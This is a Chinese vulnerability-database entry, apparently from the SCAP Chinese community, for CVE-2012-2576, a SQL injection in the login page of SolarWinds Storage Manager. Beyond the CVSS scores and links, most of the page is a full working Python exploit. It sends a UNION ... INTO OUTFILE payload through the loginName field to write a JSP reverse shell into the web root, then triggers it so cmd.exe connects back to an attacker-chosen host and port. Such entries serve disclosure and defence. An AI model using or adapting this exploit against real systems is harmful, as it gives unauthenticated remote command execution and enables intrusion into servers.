CVE-2012-2576
CVSS10.0
发布时间 :2017-12-20 16:29:00
修订时间 :2018-01-11 09:26:31
NME    

[原文]SQL injection vulnerability in the LoginServlet page in SolarWinds Storage Manager before 5.1.2, SolarWinds Storage Profiler before 5.1.2, and SolarWinds Backup Profiler before 5.1.2 allows remote attackers to execute arbitrary SQL commands via the loginName field.


[CNNVD]CNNVD数据暂缺。


[机译]**储备**候选人由一个组织或个人将使用它宣布了新的安全问题时,已预留。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-89 [SQL命令中使用的特殊元素转义处理不恰当(SQL注入)]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2576
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2576
(官方数据源) NVD

- 其它链接及资源

http://www.exploit-db.com/exploits/18818
(VENDOR_ADVISORY)  EXPLOIT-DB  18818
http://www.exploit-db.com/exploits/18833
(VENDOR_ADVISORY)  EXPLOIT-DB  18833
http://www.securityfocus.com/bid/51639
(VENDOR_ADVISORY)  BID  51639
http://www.solarwinds.com/documentation/storage/storagemanager/docs/ReleaseNotes/vulnerability.htm
(VENDOR_ADVISORY)  CONFIRM  http://www.solarwinds.com/documentation/storage/storagemanager/docs/ReleaseNotes/vulnerability.htm
https://exchange.xforce.ibmcloud.com/vulnerabilities/72680
(VENDOR_ADVISORY)  XF  solarwnds-loginservlet-sql-injection(72680)

- 漏洞信息 (18818)

Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit (EDBID:18818)
windows remote
2012-05-01 Verified
0 muts
N/A [点击下载]
#!/usr/bin/python
######################################################################################
# Exploit Title: Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit
# Date: May 2nd 2012
# Author: muts
# Version: SolarWinds Storage Manager 5.1.0
# Tested on: Windows 2003
# Archive Url : http://www.offensive-security.com/0day/solarshell.txt
######################################################################################
# Discovered by Digital Defence - DDIVRT-2011-39
######################################################################################


import urllib, urllib2, cookielib
import sys
import random

print "\n[*] Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit"
print "[*] Vulnerability discovered by Digital Defence - DDIVRT-2011-39"

print "[*] Offensive Security - http://www.offensive-security.com\n"
if (len(sys.argv) != 4):
	print "[*] Usage: solarshell.py <RHOST> <LHOST> <LPORT>"
	exit(0)

rhost = sys.argv[1]
lhost = sys.argv[2]
lport = sys.argv[3]

filename = ''
for i in random.sample('abcdefghijklmnopqrstuvwxyz1234567890',6):
	filename+=i
filename +=".jsp"

output_path= "c:/Program Files/SolarWinds/Storage Manager Server/webapps/ROOT/%s" %filename

jsp = '''<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>

<%
	class StreamConnector extends Thread
	{
		InputStream is;
		OutputStream os;

		StreamConnector( InputStream is, OutputStream os )
		{
		this.is = is;
		this.os = os;
		}

		public void run()
		{
		BufferedReader in  = null;
		BufferedWriter out = null;
try
{
	in  = new BufferedReader( new InputStreamReader( this.is ) );
	out = new BufferedWriter( new OutputStreamWriter( this.os ) );
	char buffer[] = new char[8192];
	int length;
	while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
	{
		out.write( buffer, 0, length );
		out.flush();
	}
} catch( Exception e ){}
try
{
	if( in != null )
		in.close();
	if( out != null )
		out.close();
} catch( Exception e ){}
		}
	}

	try
	{
		Socket socket = new Socket( "''' + lhost +'''", '''+lport+''');
		Process process = Runtime.getRuntime().exec( "cmd.exe" );
		( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
		( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
	} catch( Exception e ) {}
%>'''

jsp = jsp.replace("\n","")
jsp = jsp.replace("\t","")

prepayload = "AAA' "
prepayload += 'union select 0x%s,2,3,4,5,6,7,8,9,10,11,12,13,14 into outfile "%s"' % (jsp.encode('hex'),output_path)
prepayload += "#"
postpayload = "1' or 1=1#--"
loginstate='checkLogin'
password = 'OHAI'

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
post_params = urllib.urlencode({'loginState' : loginstate, 'loginName' : prepayload,'password' : password})
print "[*] Sending evil payload"
resp = opener.open("http://%s:9000/LoginServlet" %rhost, post_params)
print "[*] Triggering shell"
post_params = urllib.urlencode({'loginState' : loginstate, 'loginName' : postpayload,'password' : password})
resp = opener.open("http://%s:9000/LoginServlet" % rhost, post_params)
resp = opener.open("http://%s:9000/%s"  % (rhost,filename))
print "[*] Check your shell on %s %s\n" % (lhost,lport)

# 01010011 01101100 01100101 01100101 01110000 01101001 01110011 01101111 
# 01110110 01100101 01110010 01110010 01100001 01110100 01100101 01100100
		
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站